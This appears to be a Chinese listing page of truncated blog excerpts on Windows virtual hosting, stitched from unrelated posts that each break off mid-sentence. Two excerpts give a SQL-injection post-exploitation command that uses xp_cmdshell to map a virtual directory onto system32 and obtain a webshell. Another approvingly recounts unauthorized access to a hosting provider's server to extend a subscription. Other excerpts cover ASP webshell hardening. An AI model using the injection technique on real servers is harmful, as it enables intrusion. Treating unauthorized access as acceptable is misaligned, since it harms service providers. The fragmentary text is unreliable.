sql注入建立虚拟目录，免得找web绝对路径----------------------------------------------------------------我们很多情况下都遇到sql注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：execmaster.dbo.xp_cmdshell'cscriptC:\Interpub\AdminScripts\mkwebdir.vbs-clocalhost-w"l"-v"win","c:\winnt\system32"'建立虚拟目录win,指向c:\winnt\system32exec...

 在Verycd上看到有人问怎么让VMware支持安装OEM版的系统，这个也一直是我想知道的。搜索了相关的资料，没发现有这个版本的。但是我想总体的思路是一样的。经过测试成功。环境是主机是联想OEMXPSP2HOME，客户机是联想OEMXPPRO，VMwareWorkstationV5.5.3Build34685。    要安装OEM版的系统当然就是改BIOS了，自己的机器不敢动手就先搞个虚拟机开刀。VMware用的是PhoenixBIOS。那修改BIOS的工具就当然是PhoenixBIOSEditor了。没有就去这里下载。  ...

有天跟朋友谈起BLOG备案的问题，无意中提到了空间提供商IDC。说起IDC，没想到朋友还有段非常不愉快的经历。 事情是这样的：当时他也是没经验，想选个虚拟主机做网站，当然出于习惯问题，他对提供自己虚拟主机空间服务的这台服务器做了下安全检测，结果他拿到了空间提供商WEB目录的权限，于是……小小地给自己加了一年的时间。没想到被他空间提供商发现了，封闭了朋友的空间和FTP账号。后来他看了下，这个空间商竟然连电子经营许可证(ICP证)都没有！汗ing.... 不过据说后来那台服务器增强了安全性，配置得还不错！既然你不仅不合法而且又得罪了偶那可爱得不能再可爱的朋友，那就免费给你做次安...

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错： exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目录win,指向c:\winnt\sy...

如果您打算在Windows Vista面市后将自己的系统升级，那么，在升级前对Windows Vista进行详尽的测试则是十分必要的，这不仅可以帮助您了解Windows Vista带来的新特性、新功能，帮助您熟练掌握Windows Vista的操作技巧，同时，也有助于让您清楚目前必备软件在Windows Vista中的兼容性，确保在将来升级时能够平衡过渡。　　一般而言，在我们安装测试的Windows Vista系统时，通常不太可能为其准备一台单独的PC，而只能在目前使用的工作机上安装。为保证目前使用的系统如Windows X...

[code]<%response.write "<br>"call server_update("cache")call server_update("session")response.write "<br>虚拟主机重启成功!"sub server_update(byval strt)  if strt="" then strt=request.querystring("delete")  select case ...

 1.为了打造一个安全的虚拟主机,在asp+SQL环境下,我们要做的是封杀ASP webshell.封杀serv-u提权漏洞和SQL注入的威胁2.默认安装的win主机上webshell功能十分强大,我们要封杀webshell的哪些功能 也就是不让webshell查看系统服务信息,执行cmd命令和略览文件目录,我们要实现的功能是每个用户只能访问自己的目录,而且可以用FSO等ASP组件,在这里我以海洋木马和win200为例给大家演示一下.好多资料都是网上收集而来,在这表示感谢.3.现在我们先设置好win的目录访问权限 设置所有分区为administrator...

1、如何让asp脚本以system权限运行? 　　修改你asp脚本所对应的虚拟目录，把"应用程序保护"修改为"低".... 2.如何防止asp木马? 　　基于FileSystemObject组件的asp木马 　　cacls %systemroot%\system32\scrrun.dll /e /d guests //禁止guests使用 　　regsvr32 scrrun.dll /u /s //删除 　　注：这样服务器的FSO就不能用了；　　...

本人上次工作于某家网络公司.负责服务器的维护工作.现失业.经过一段时间的了解.自认为在构件Windows服务器平台上有所经验.鉴于现在很多朋友都开始谋划属于自己的虚拟主机.并且呢.网上相关文章都是很老的那种.所以自己冒昧准备写一系列. 希望各位多多指点.有问题有错误多多斧正.谢谢.开头很严肃吧.呵呵.那下面就轻松点.哎.才跟GF去吃午饭了.撑的我.哎.老打嗝.这人跟机器就一样.快的确是挺好.但是要稳定.服务器的稳定就好比谈恋爱的稳定.否则一天三顿吵.外加吃个消夜.那就甭想好点工作了.呵呵.要建立稳定的恋爱关系.那首先.基础很重要.人品.性格.爱好.对不对?那我们就先说硬件吧.当然推荐...

现在绝大多数的虚拟主机都禁用了ASP的标准组件：FileSystemObject，因为这个组件为ASP提供了强大的文件系统访问能力，可以对服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作（当然，这是指在使用默认设置的WindowsNT/2000下才能做到）。但是禁止此组件后，引起的后果就是所有利用这个组件的ASP将无法运行，无法满足客户的需求。　　如何既允许FileSystemObject组件，又不影响服务器的安全性（即：不同虚拟主机用户之间不能使用该组件读写别人的文件）呢？这里介绍本人在实验中获得的一种方法，下文以Windows2000Server为例来说明。　　在服务器上打开资源管...

在弹出的“选择组”对话框中找到“Guests”，点“添加”，此组就会出现在下方的文本框中，然后点“确定”：<IMGSRC="http://202.100.116.12/paddy/bbsimages/fsosafe/007.gif"border=0>　　出现的就是如下图所示的内容，点“确定”关闭此对话框：<IMGSRC="http://202.100.116.12/paddy/bbsimages/fsosafe/008.gif"border=0>　　打开“Internet信息服务”，开始对虚拟主机进行设置，本例中的以对“第一虚拟主...